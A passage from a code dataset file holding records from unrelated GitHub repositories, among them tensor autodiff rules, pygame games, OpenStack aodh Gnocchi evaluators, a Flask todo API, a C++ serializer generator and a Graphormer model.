fusemap):\n\n inputs = Indices(*tn.union_inds(x))\n outputs = Indices(*tn.union_inds(out))\n splitmap = {}\n\n for inp, out in fusemap.items():\n\n inp = inputs.map(*inp)\n out, = outputs.map(out)\n\n splitmap[out] = inp \n\n return tn.transpose_like(tn.split(g, splitmap), x)\n\n\n\ndef vjp_split(g, out, x, splitmap):\n\n inputs = Indices(*tn.union_inds(x))\n outputs = Indices(*tn.union_inds(out))\n fusemap = {}\n\n for inp, out in splitmap.items():\n\n inp, = inputs.map(inp)\n out = outputs.map(*out)\n\n fusemap[out] = inp \n\n return tn.transpose_like(tn.fuse(g, fusemap), x)\n\n\n\ndef vjp_squeeze(g, out, x, inds=None):\n\n singletons = tuple(tn.complement_inds(x, out))\n\n return tn.transpose_like(tn.unsqueeze(g, singletons), x)\n\n\n\ndef vjp_unsqueeze(g, out, x, inds):\n\n return tn.transpose_like(tn.squeeze(g, inds), x)\n\n\n\ndef vjp_expand(g, out, x, inds):\n\n return tn.reshape_like(g, x)\n\n\n\ndef vjp_flatten(g, out, x, ind):\n\n if ind is None:\n ind = \"flat\" \n\n fusemap = {tuple(tn.union_inds(x)): ind}\n\n return vjp_fuse(g, out, x, fusemap)\n\n\n\n\n# --- Record reindexing and reshaping VJPs ---------------------------------- #\n \nad.makevjp(tn.reindex, vjp_reindex)\nad.makevjp(tn.transpose, vjp_transpose) \nad.makevjp(tn.fuse, vjp_fuse)\nad.makevjp(tn.split, vjp_split)\nad.makevjp(tn.squeeze, vjp_squeeze)\nad.makevjp(tn.unsqueeze, vjp_unsqueeze)\nad.makevjp(tn.expand, vjp_expand)\nad.makevjp(tn.flatten, vjp_flatten)\n\n\n\n","repo_name":"dkilda/tadpole","sub_path":"tadpole/tensorwrap/vjps/reindexing.py","file_name":"reindexing.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18267777868","text":"class Solution:\n # Solution 1\n def missingNumber(self, nums: List[int]) -> int:\n tmp_nums = [False] * (len(nums) + 1)\n for num in nums:\n tmp_nums[num] = True\n for 
i in range(len(tmp_nums)):\n            if tmp_nums[i] == False:\n                return i\n    \n    # Solution 2\n    def missingNumber2(self, nums: List[int]) -> int:\n        n = len(nums)\n        missing_num = int(n * (n + 1) / 2 - sum(nums))\n        return missing_num\n","repo_name":"aeglushkov/leetcode-tasks","sub_path":"algorithms/Array/268. Missing Number/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7531732279","text":"import pygame\nimport gamemusic\nimport random\n\n\n# Drop item class\nclass Drop:\n    def __init__(self, tank, drop_type):\n        self.image = None\n        self.drop_type = drop_type\n        self.music = None\n        if drop_type == 'AddBullet':\n            self.image = pygame.image.load('img/drop/AddBullet.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Clock':\n            self.image = pygame.image.load('img/drop/Clock.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Gasoline':\n            self.image = pygame.image.load('img/drop/Gasoline.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Kit':\n            self.image = pygame.image.load('img/drop/Kit.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Net':\n            self.image = pygame.image.load('img/drop/Net.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'PurpleBullet':\n            self.image = pygame.image.load('img/drop/PurpleBullet.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Rage':\n            self.image = pygame.image.load('img/drop/Rage.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'RedBullet':\n            self.image = pygame.image.load('img/drop/RedBullet.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Shield':\n            self.image = pygame.image.load('img/drop/Shield.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Snow':\n            self.image = pygame.image.load('img/drop/Snow.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        elif drop_type == 'Star':\n            self.image = pygame.image.load('img/drop/spare.png')\n            self.music = gamemusic.Music('img/get_item.wav')\n        else:\n            raise ValueError('Unknown drop type.')\n        # Move the drop to the tank's position\n        self.rect = self.image.get_rect().move(tank.rect.left, tank.rect.top)\n        # Pickup state of the drop; set to False once it is picked up\n        self.live = True\n\n\n# Collision between a drop and a tank\ndef drop_hit_tank(drop, MainGame, tank_type):\n    if tank_type == 'EnemyTank':\n        pass\n    elif tank_type == 'PlayerTank':\n        if MainGame.my_tank and MainGame.my_tank.live:\n            if pygame.sprite.collide_rect(MainGame.my_tank, drop):\n                ran = random.randint(1, 100)\n                # Update the state of the drop and of our tank\n                drop.live = False\n                if drop.drop_type == 'AddBullet':\n                    if ran <= 33:\n                        MainGame.AP_num += 5\n                    elif ran <= 66:\n                        MainGame.APCR_num += 5\n                    else:\n                        MainGame.HE_num += 5\n                elif drop.drop_type == 'Kit':\n                    # Restore health\n                    MainGame.my_tank.status.health = min(MainGame.my_tank.status.health + 100,\n                                                         MainGame.my_tank.status.max_health)\n                elif drop.drop_type == 'Net':\n                    # Stealth net\n                    MainGame.my_tank.status.immune_t = 10000\n                elif drop.drop_type == 'PurpleBullet':\n                    # Purple shell\n                    MainGame.my_tank.status.add('Penetration', 0, 30, 10000)\n                elif drop.drop_type == 'Rage':\n                    # Rage mode\n                    # 1.5x fire rate\n                    MainGame.my_tank.status.add('FireRate', 1, -0.333, 10000)\n                    # Speed +2\n                    MainGame.my_tank.status.add('TankSpeed', 0, 2, 10000)\n                elif drop.drop_type == 'RedBullet':\n                    # Red shell\n                    MainGame.my_tank.status.add('Damage', 0, 60, 10000)\n                elif drop.drop_type == 'Shield':\n                    # Shield\n                    MainGame.my_tank.status.immune_c += 1\n                elif drop.drop_type == 'Snow':\n                    # Snowflake\n                    for enemy_tank in MainGame.enemyTankList:\n                        enemy_tank.status.add('TankSpeed', 1, -0.4, 5000)\n                elif drop.drop_type == 'Gasoline':\n                    # Gasoline\n                    MainGame.my_tank.status.add('TankSpeed', 0, 3, 10000)\n                elif drop.drop_type == 'Star':\n                    pass\n                elif drop.drop_type == 'Clock':\n                    MainGame.time += 30000\n                else:\n                    raise ValueError('Unknown drop type.')\n\n\n# Method for displaying a drop\ndef display_drop(drop, main_game):\n    # Blit the image surface onto the window\n    main_game.window.blit(drop.image, drop.rect)\n\n\n# Iterate over the drop list and display the drops\ndef blit_drop(MainGame):\n    for drop in MainGame.dropList:\n        if drop.live:  # check whether the drop is still active\n            display_drop(drop, MainGame)\n\n\n# Iterate over the drop list\ndef check_drop(MainGame):\n    for drop in MainGame.dropList:\n        if drop.live:  # check whether the drop is still active\n            # invoke the drop/tank collision handler\n            drop_hit_tank(drop, MainGame, 'PlayerTank')\n        else:\n            drop.music.play()\n            MainGame.dropList.remove(drop)\n","repo_name":"zzzgod/SoulTank","sub_path":"gamedrop.py","file_name":"gamedrop.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9366511442","text":"import json\n\nfrom gnocchiclient import client\nfrom gnocchiclient import exceptions\nfrom oslo_log import log\n\nfrom aodh.evaluator import threshold\nfrom aodh import keystone_client\n\nLOG = log.getLogger(__name__)\n\n# The list of points that Gnocchi API returned is composed\n# of tuples with (timestamp, granularity, value)\nGRANULARITY = 1\nVALUE = 2\n\n\nclass GnocchiBase(threshold.ThresholdEvaluator):\n    def __init__(self, conf):\n        super(GnocchiBase, self).__init__(conf)\n        self._gnocchi_client = client.Client(\n            '1', keystone_client.get_session(conf),\n            adapter_options={\n                'interface': conf.service_credentials.interface,\n                'region_name': conf.service_credentials.region_name})\n\n    @staticmethod\n    def _sanitize(rule, statistics):\n        \"\"\"Return the datapoints that correspond to the alarm granularity\"\"\"\n        # TODO(sileht): if there's no direct match, but there is an archive\n        # policy with granularity that's an even divisor or the period,\n        # we could potentially do a mean-of-means (or max-of-maxes or whatever,\n        # but not a stddev-of-stddevs).\n        # TODO(sileht): support alarm['exclude_outliers']\n        LOG.debug('sanitize stats %s', statistics)\n        # NOTE(jamespage)\n        # Dynamic Aggregates are returned in a dict struct so\n        # check for this first.\n        if isinstance(statistics, dict):\n            # Pop array of measures from aggregated subdict\n            statistics = statistics['measures']['aggregated']\n        statistics = [stats[VALUE] for stats in statistics\n                      if stats[GRANULARITY] == rule['granularity']]\n        if not statistics:\n            raise threshold.InsufficientDataError(\n                \"No datapoint for granularity %s\" % rule['granularity'], [])\n        statistics = statistics[-rule['evaluation_periods']:]\n        LOG.debug('pruned statistics to %d', len(statistics))\n        return statistics\n\n\nclass GnocchiResourceThresholdEvaluator(GnocchiBase):\n    def _statistics(self, rule, start, end):\n        try:\n            return self._gnocchi_client.metric.get_measures(\n                metric=rule['metric'],\n                granularity=rule['granularity'],\n                start=start, stop=end,\n                resource_id=rule['resource_id'],\n                aggregation=rule['aggregation_method'])\n        except exceptions.MetricNotFound:\n            raise threshold.InsufficientDataError(\n                'metric %s for resource %s does not exist' %\n                (rule['metric'], rule['resource_id']), [])\n        except exceptions.ResourceNotFound:\n            raise threshold.InsufficientDataError(\n                'resource %s does not exist' % rule['resource_id'], [])\n        except exceptions.NotFound:\n            # 
TODO(sileht): gnocchiclient should raise an explicit\n            # exception for AggregationNotFound, this API endpoint\n            # can only raise 3 different 404, so we are safe to\n            # assume this is an AggregationNotFound for now.\n            raise threshold.InsufficientDataError(\n                'aggregation %s does not exist for '\n                'metric %s of resource %s' % (rule['aggregation_method'],\n                                              rule['metric'],\n                                              rule['resource_id']),\n                [])\n        except Exception as e:\n            msg = 'alarm statistics retrieval failed: %s' % e\n            LOG.warning(msg)\n            raise threshold.InsufficientDataError(msg, [])\n\n\nclass GnocchiAggregationMetricsThresholdEvaluator(GnocchiBase):\n    def _statistics(self, rule, start, end):\n        try:\n            _operations = [\n                'aggregate', rule['aggregation_method']\n            ]\n            for metric in rule['metrics']:\n                _operations.append(\n                    [\n                        'metric', metric,\n                        rule['aggregation_method'].lstrip('rate:')\n                    ]\n                )\n            # FIXME(sileht): In case a heat autoscaling stack decides to\n            # delete an instance, the gnocchi metrics associated with this\n            # instance will no longer be updated, and when the alarm asks\n            # for the aggregation, gnocchi will raise a 'No overlap'\n            # exception.\n            # So temporarily set 'needed_overlap' to 0 to disable the\n            # gnocchi checks about missing points. For more detail see:\n            # https://bugs.launchpad.net/gnocchi/+bug/1479429\n            return self._gnocchi_client.aggregates.fetch(\n                operations=_operations,\n                granularity=rule['granularity'],\n                start=start, stop=end,\n                needed_overlap=0)\n        except exceptions.MetricNotFound:\n            raise threshold.InsufficientDataError(\n                'At least one of the metrics in %s does not exist' %\n                rule['metrics'], [])\n        except exceptions.NotFound:\n            # TODO(sileht): gnocchiclient should raise an explicit\n            # exception for AggregationNotFound, this API endpoint\n            # can only raise 3 different 404, so we are safe to\n            # assume this is an AggregationNotFound for now.\n            raise threshold.InsufficientDataError(\n                'aggregation %s does not exist for at least one '\n                'metric in %s' % (rule['aggregation_method'],\n                                  rule['metrics']), [])\n        except Exception as e:\n            msg = 'alarm statistics retrieval failed: %s' % e\n            LOG.warning(msg)\n            raise threshold.InsufficientDataError(msg, [])\n\n\nclass GnocchiAggregationResourcesThresholdEvaluator(GnocchiBase):\n    def _statistics(self, rule, start, end):\n        try:\n            # FIXME(sileht): In case a heat autoscaling stack decides to\n            # delete an instance, the gnocchi metrics associated with this\n            # instance will no longer be updated, and when the alarm asks\n            # for the aggregation, gnocchi will raise a 'No overlap'\n            # exception.\n            # So temporarily set 'needed_overlap' to 0 to disable the\n            # gnocchi checks about missing points. For more detail see:\n            # https://bugs.launchpad.net/gnocchi/+bug/1479429\n            return self._gnocchi_client.aggregates.fetch(\n                operations=[\n                    'aggregate', rule['aggregation_method'],\n                    [\n                        'metric', rule['metric'],\n                        rule['aggregation_method'].lstrip('rate:')\n                    ]\n                ],\n                granularity=rule['granularity'],\n                search=json.loads(rule['query']),\n                resource_type=rule[\"resource_type\"],\n                start=start, stop=end,\n                needed_overlap=0)\n        except exceptions.MetricNotFound:\n            raise threshold.InsufficientDataError(\n                'metric %s does not exist' % rule['metric'], [])\n        except exceptions.NotFound:\n            # TODO(sileht): gnocchiclient should raise an explicit\n            # exception for AggregationNotFound, this API endpoint\n            # can only raise 3 different 404, so we are safe to\n            # assume this is an AggregationNotFound for now.\n            raise threshold.InsufficientDataError(\n                'aggregation %s does not exist for at least one '\n                'metric of the query' % rule['aggregation_method'], [])\n        except Exception as e:\n            msg = 'alarm statistics retrieval failed: %s' % e\n            LOG.warning(msg)\n            raise threshold.InsufficientDataError(msg, [])\n","repo_name":"openstack/aodh","sub_path":"aodh/evaluator/gnocchi.py","file_name":"gnocchi.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"}
+{"seq_id":"2321258813","text":"import os\n# To use a consistent encoding\nfrom codecs import open\n\nimport setuptools\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n    long_description = f.read()\n\nsetuptools.setup(\n    name=\"vit-vqgan\",\n    version=\"0.0.1\",\n    description=\"JAX implementation of ViT-VQGAN\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    packages=setuptools.find_packages(),\n    install_requires=[\"jax>=0.2.6\", \"flax\", \"transformers\", \"lpips-j\"],\n)\n","repo_name":"patil-suraj/vit-vqgan","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"}
+{"seq_id":"41991412379","text":"# This is using just flask, not marshmallow.\n\nfrom flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport os\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + os.path.join(basedir, \"app.sqlite\")\n\nCORS(app)\n\ndb = SQLAlchemy(app)\n\n# to this point it's boilerplate. Code Snippet?\n# pipenv install, run things in the shell.\n# make sure you install flask, and the flask alchemy / cors etc. 
to your pipenv before running the prog.\n# in pipenv, enter python, from app import db, db.create_all()\n\nclass Todo(db.Model):\n    __tablename__ = \"todos\"\n    id = db.Column(db.Integer, primary_key=True)\n    title = db.Column(db.String(100), nullable = False) # 100 = character limit, nullable means has to have some input (can't be empty)\n    done = db.Column(db.Boolean)\n\n\n    def __init__(self, title, done):\n        self.title = title\n        self.done = done\n\n@app.route(\"/todos\", methods=[\"GET\"])\ndef get_todos():\n    all_todos = db.session.query(Todo.id, Todo.title, Todo.done).all()\n    return jsonify(all_todos)\n\n@app.route(\"/add-todo\", methods=[\"POST\"])\ndef add_todo():\n    if request.content_type == \"application/json\":\n        post_data = request.get_json()\n\n        title = post_data.get(\"title\")\n        done = post_data.get(\"done\")\n\n        record = Todo(title, done)\n        db.session.add(record)\n        db.session.commit()\n        return jsonify([record.id, record.title, record.done])\n    return jsonify(\"Check content_type and try again\")\n\n@app.route(\"/todo/<id>\", methods=[\"PUT\"])\ndef update_todo(id):\n    if request.content_type == \"application/json\":\n        put_data = request.get_json()\n\n        title = put_data.get(\"title\")\n        done = put_data.get(\"done\")\n\n        record = db.session.query(Todo).get(id)\n        record.title = title\n        record.done = done \n        \n        db.session.commit()\n        return jsonify(\"Update Successful\")\n    return jsonify(\"Check content_type and try again\")\n\n@app.route(\"/todo/<id>\", methods=[\"DELETE\"])\ndef delete_todo(id):\n    record = db.session.query(Todo).get(id)\n    db.session.delete(record)\n    db.session.commit()\n\n    return jsonify(\"Record DELETED!!\") \n\n# if __name__ ==\"__main__\":\n    # app.debug = True\n    # app.run()","repo_name":"ChrisStreadbeck/todo-list-API","sub_path":"app_flask.py","file_name":"app_flask.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"35865432382","text":"import pygame\nfrom color.Color import *\nfrom follow_player.player.Player import Player\nfrom follow_player.enemy.Enemy import Enemy\nfrom vector.Vector import Vector\nfrom follow_player.settings.Settings import screen_height, screen_width\n\n\nclass Game:\n    def __init__(self):\n        pygame.init()\n        self.__screen = pygame.display.set_mode([screen_width, screen_height])\n        self.__clock = pygame.time.Clock()\n        self.__player = Player(self.__screen, Vector(screen_width / 2 - 25, screen_height / 2 - 25), 50, 50)\n        self.__enemies = [\n            Enemy(self.__screen, Vector(0, 0), self.__player.get_player_center()),\n            Enemy(self.__screen, Vector(screen_width - 50, screen_height - 50), self.__player.get_player_center()),\n            Enemy(self.__screen, Vector(screen_width - 50, 0), self.__player.get_player_center()),\n            Enemy(self.__screen, Vector(0, screen_height - 50), self.__player.get_player_center())\n        ]\n\n    @staticmethod\n    def __quit_program():\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                return False\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_ESCAPE:\n                    return False\n        return True\n\n    def __check_collision(self):\n        for enemy in self.__enemies:\n            if enemy.alive:\n                self.__collision_detection(self.__player, enemy)\n                for e in self.__enemies:\n                    if e.alive and (e is not enemy):\n                        self.__collision_detection(e, enemy)\n\n    @staticmethod\n    def __collision_detection(rect1, rect2):\n        rect1_top = rect1.get_vector()\n        rect1_bottom = Vector(rect1.get_vector().x + rect1.get_width(), rect1.get_vector().y + rect1.get_height())\n\n        rect2_top = 
rect2.get_vector()\n rect2_bottom = Vector(rect2.get_vector().x + rect2.get_width(), rect2.get_vector().y + rect2.get_height())\n\n if ((rect1_bottom.x >= rect2_top.x >= rect1_top.x) or (rect1_bottom.x >= rect2_bottom.x >= rect1_top.x))\\\n and (\n (rect1_bottom.y >= rect2_top.y >= rect1_top.y) or (rect1_bottom.y >= rect2_bottom.y >= rect1_top.y)\n ):\n rect1.alive = False\n rect2.alive = False\n\n def check_enemy_lives(self):\n alive = True\n for enemy in self.__enemies:\n if enemy.alive:\n alive = False\n return alive\n\n def update(self):\n self.__player.update()\n for enemy in self.__enemies:\n enemy.update()\n self.__check_collision()\n\n def draw(self):\n self.__player.draw()\n for enemy in self.__enemies:\n enemy.draw()\n\n def run(self):\n run_game = True\n font = pygame.font.Font('freesansbold.ttf', 32)\n\n while run_game:\n self.__screen.fill(white)\n if not self.__player.alive:\n self.__screen.fill(red)\n text = font.render('You lose!!', True, white)\n text_rect = text.get_rect()\n text_rect.center = (screen_width // 2, screen_height // 2)\n self.__screen.blit(text, text_rect)\n elif self.check_enemy_lives():\n self.__screen.fill(green)\n text = font.render('You win!!', True, white)\n text_rect = text.get_rect()\n text_rect.center = (screen_width // 2, screen_height // 2)\n self.__screen.blit(text, text_rect)\n else:\n self.update()\n self.draw()\n\n run_game = self.__quit_program()\n\n pygame.display.update()\n self.__clock.tick(90)\n quit()\n\n\ngame = Game()\ngame.run()\n","repo_name":"JoZonneveld/TCR_pygame","sub_path":"follow_player/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31498895214","text":"import sys\nimport os\nimport CppHeaderParser\n\nheaders = []\nclasses = []\n\ntype_only = None\ntype_only_others = []\n\n\nclass CPPAttribute:\n def __init__(self, name, type):\n self.name = name\n self.type = type\n\n def __repr__(self):\n return str((self.name, self.type))\n\n\nclass CPPClass:\n\n def __init__(self):\n self.name = \"\"\n self.parent = None\n self.file = \"\"\n self.attrs = []\n\n def __repr__(self):\n return str((self.name, self.file, self.attrs))\n\n def generate_code(self):\n output_string = f'void {self.name}::serialize(TCODZip* zip) {{\\n'\n\n # Serialize\n if self.parent is not None:\n output_string += f'\\t{self.parent}::serialize(zip);\\n'\n\n for i in self.attrs:\n real_type = i.type\n\n if i.type.split()[0] == 'static':\n i.type = i.type.split()[1]\n\n if i.type == 'int' or i.type == 'unsigned int' or i.type == 'long' or i.type == 'unsigned long'\\\n or i.type == 'bool' or i.type == 'long long' or i.type == 'unsigned long long':\n output_string += f'\\tzip->putInt({i.name});\\n'\n elif i.type == 'char' or i.type == 'unsigned char':\n output_string += f'\\tzip->putChar({i.name});\\n'\n elif i.type == 'const char*':\n output_string += f'\\tzip->putString({i.name});\\n'\n elif i.type == 'std::string':\n output_string += f'\\tzip->putString({i.name}.c_str());\\n'\n elif i.type == 'float' or i.type == 'double':\n output_string += f'\\tzip->putFloat({i.name});\\n'\n elif i.type == 'TCODColor':\n output_string += f'\\tzip->putColor(&{i.name});\\n'\n elif i.type == 'TCODConsole':\n output_string += f'\\tzip->putConsole({i.name});\\n'\n else:\n output_string += f'\\t{i.name}.serialize(zip); // {real_type}\\n'\n output_string += '}\\n\\n'\n\n output_string += f'void {self.name}::deserialize(TCODZip* zip) {{\\n'\n\n # 
Deserialize\n        if self.parent is not None:\n            output_string += f'\\t{self.parent}::deserialize(zip);\\n'\n\n        for i in self.attrs:\n            real_type = i.type\n\n            if i.type.split()[0] == 'static':\n                i.type = i.type.split()[1]\n\n            if i.type == 'int' or i.type == 'unsigned int' or i.type == 'long' or i.type == 'unsigned long'\\\n                    or i.type == 'bool' or i.type == 'long long' or i.type == 'unsigned long long':\n                output_string += f'\\t{i.name} = zip->getInt();\\n'\n            elif i.type == 'char' or i.type == 'unsigned char':\n                output_string += f'\\t{i.name} = zip->getChar();\\n'\n            elif i.type == 'const char*':\n                output_string += f'\\t{i.name} = zip->getString();\\n'\n            elif i.type == 'std::string':\n                output_string += f'\\t{i.name} = zip->getString();\\n'\n            elif i.type == 'float' or i.type == 'double':\n                output_string += f'\\t{i.name} = zip->getFloat();\\n'\n            elif i.type == 'TCODColor':\n                output_string += f'\\t{i.name} = zip->getColor();\\n'\n            elif i.type == 'TCODConsole':\n                output_string += f'\\t{i.name} = zip->getConsole();\\n'\n            else:\n                output_string += f'\\t{i.name}.deserialize(zip); // {real_type}\\n'\n        output_string += '}\\n\\n'\n\n        return output_string\n\n\ndef parse_file(file):\n    parser = CppHeaderParser.CppHeader(file)\n    print(len(parser.classes), file)\n    for i in parser.classes_order:\n        obj = CPPClass()\n        obj.name = i['name']\n        obj.file = os.fsdecode(file)\n        if len(i['inherits']) != 0:\n            obj.parent = i['inherits'][0]['class']\n        for access in ['public', 'protected', 'private']:\n            for j in i['properties'][access]:\n                if not (j['pointer'] and j['type'].split()[0] == 'const'):\n                    if j['pointer'] == 1:\n                        continue\n                    if j['type'].split()[0] == 'const':\n                        continue\n                    obj.attrs.append(CPPAttribute(j['name'], j['type']))\n        classes.append(obj)\n\n\ndef fill_type_only_others():\n    times = 1\n    while times > 0:\n        times = 0\n        for c in classes:\n            if (c.parent == type_only or c.parent in type_only_others) and c.name not in type_only_others:\n                type_only_others.append(c.name)\n                if times == 0:\n                    times = 1\n\n\ndef add_helper_function():\n    string = ''\n    string += 'template <class T>\\n'\n    string += f'static {type_only}* create_{type_only.lower()}_instance() {{ return new T; }}\\n\\n'\n    string += f'std::map type_map = {{\\n'\n    for c in classes:\n        if c.name == type_only or c.parent == type_only \\\n                or c.parent in type_only_others or c.name in type_only_others:\n            string += f'\\t{{ typeid({c.name}).name(), create_{type_only.lower()}_instance<{c.name}> }},\\n'\n    string += '};\\n'\n    return string\n\nfor file in os.listdir(os.fsdecode(sys.argv[1])):\n    filename = os.fsdecode(file)\n    if filename.endswith('.h'):\n        headers.append(filename)\n\nos.chdir(sys.argv[1])\n\nif len(sys.argv) > 2:\n    type_only = sys.argv[2]\n\nfor h in headers:\n    parse_file(h)\n\nfinal_output = \"\"\n\nfill_type_only_others()\n\nfor c in classes:\n    if type_only is not None:\n        if c.name == type_only or c.parent == type_only \\\n                or c.parent in type_only_others or c.name in type_only_others:\n            final_output += f'// {c.file} - {c.name} - inherits {c.parent}\\n'\n            final_output += c.generate_code()\n    else:\n        final_output += f'// {c.file} - {c.name} - inherits {c.parent}\\n'\n        final_output += c.generate_code()\n\nif type_only is not None:\n    final_output += '// Helps deserialize derived types\\n\\n'\n    final_output += add_helper_function()\n\n\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\n\nwith open('serializer_output.cpp', 'w') as f:\n    
f.write(final_output)\n\nprint('Done')\n\n","repo_name":"Steelsphere/tcod_sl_code_generator","sub_path":"serialize_code_generator.py","file_name":"serialize_code_generator.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44726830445","text":"UID_ON_OFF = 1\nUID_USER_MODE = 2\nUID_FAN_SPEED = 4\nUID_VANE_UP_DOWN_POSITION = 5\nUID_USER_SETPOINT = 9\nUID_RETURN_PATH_TEMPERATURE = 10\nUID_REMOTE_DISABLE = 12\nUID_ON_TIME = 13\nUID_ALARM_STATUS = 14\nUID_ERROR_CODE = 15\nUID_MIN_TEMPERATURE_SETPOINT = 35\nUID_MAX_TEMPERATURE_SETPOINT = 36\nUID_OUTDOOR_TEMPERATURE = 37\nUID_MAINTENANCE_TIME = 181\nUID_MAINTENANCE_CONFIG = 182\nUID_MAINTENANCE_FILTER_TIME = 183\nUID_MAINTENANCE_FILTER_CONFIG = 184\n\nuidLabels={\n 1:\"On/off\",\n 2:\"User Mode\",\n 4:\"Fan Speed\",\n 5:\"Vane Up/Down position\",\n 9:\"User Setpoint\",\n 10:\"Return Path Temperature\",\n 12:\"Remote Disable\",\n 13:\"On Time\",\n 14:\"Alarm Status\",\n 15:\"Error Code\",\n 35:\"Min Temperature Setpoint\",\n 36:\"Max Temperature Setpoint\",\n 37:\"Outdoor Temperature\",\n 181:\"Maintenance time\",\n 182:\"Maintenance config\",\n 183:\"Maintenance Filter time\",\n 184:\"Maintenance Filter config\"\n}\n\ndatapointLabels = {\n 1: {0:'Off',1:'On'}, \n 2: {0:'Auto', 1:'Heat', 2:'Dry', 3:'Fan', 4:'Cool'},\n 4: {1:'Speed 1', 2:'Speed 2', 3:'Speed 3', 4:'Speed 4'},\n 5: {1:'Position 1', 2:'Position 2', 3:'Position 3', 4:'Position 4', 10:'Swing'},\n 12: {0:'Remote Enabled',1:'Remote Disabled'}, \n 14: {0:'Off',1:'On'}\n}\n\n","repo_name":"mchlt/intesisHome-py","sub_path":"code/IHconstants.py","file_name":"IHconstants.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30861050532","text":"import torch\nimport torch_geometric.graphgym.register as register\nfrom torch_geometric.graphgym.config import cfg\nfrom torch_geometric.graphgym.models.gnn import FeatureEncoder, GNNPreMP\nfrom torch_geometric.graphgym.register import register_network\n\nfrom graphgps.layer.graphormer_layer import GraphormerLayer\n\n\n@register_network('Graphormer')\nclass GraphormerModel(torch.nn.Module):\n \"\"\"Graphormer port to GraphGPS.\n https://arxiv.org/abs/2106.05234\n Ying, C., Cai, T., Luo, S., Zheng, S., Ke, G., He, D., ... & Liu, T. Y.\n Do transformers really perform badly for graph representation? 
(NeurIPS2021)\n \"\"\"\n\n def __init__(self, dim_in, dim_out):\n super().__init__()\n self.encoder = FeatureEncoder(dim_in)\n dim_in = self.encoder.dim_in\n\n if cfg.gnn.layers_pre_mp > 0:\n self.pre_mp = GNNPreMP(\n dim_in, cfg.gnn.dim_inner, cfg.gnn.layers_pre_mp)\n dim_in = cfg.gnn.dim_inner\n\n if not cfg.graphormer.embed_dim == cfg.gnn.dim_inner == dim_in:\n raise ValueError(\n f\"The inner and embed dims must match: \"\n f\"embed_dim={cfg.graphormer.embed_dim} \"\n f\"dim_inner={cfg.gnn.dim_inner} dim_in={dim_in}\"\n )\n\n layers = []\n for _ in range(cfg.graphormer.num_layers):\n layers.append(GraphormerLayer(\n embed_dim=cfg.graphormer.embed_dim,\n num_heads=cfg.graphormer.num_heads,\n dropout=cfg.graphormer.dropout,\n attention_dropout=cfg.graphormer.attention_dropout,\n mlp_dropout=cfg.graphormer.mlp_dropout\n ))\n self.layers = torch.nn.Sequential(*layers)\n\n GNNHead = register.head_dict[cfg.gnn.head]\n self.post_mp = GNNHead(dim_in=cfg.gnn.dim_inner, dim_out=dim_out)\n\n def forward(self, batch):\n for module in self.children():\n batch = module(batch)\n return batch\n","repo_name":"rampasek/GraphGPS","sub_path":"graphgps/network/graphormer.py","file_name":"graphormer.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} +{"seq_id":"70182121769","text":"from app import app\nfrom flask import render_template, redirect, request, flash, session, url_for, escape\nimport model\nfrom forms import RegistrationForm, AmazonSearch, LoginForm, BookSearch, UpdateUser\nfrom wtforms import Form, BooleanField, StringField, validators\nfrom search_amazon import get_book_by_title_author, get_book_info\nimport config \nfrom config import *\nimport hashlib\nfrom sqlalchemy import distinct\nfrom datetime import datetime\nfrom twilio.rest import TwilioRestClient\n\n\nclient = TwilioRestClient(config.account_sid, config.auth_token)\nmy_phone = config.my_phone\ntwilio_phone = config.twilio_phone\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\telse:\n\t\tuser = None\n\treturn render_template(\"index.html\", title=\"Home\", user=user)\n\n@app.route(\"/user/new\", methods=[\"GET\"])\ndef new_user_form():\n\t#Display HTML form to create a new user\n\tform = 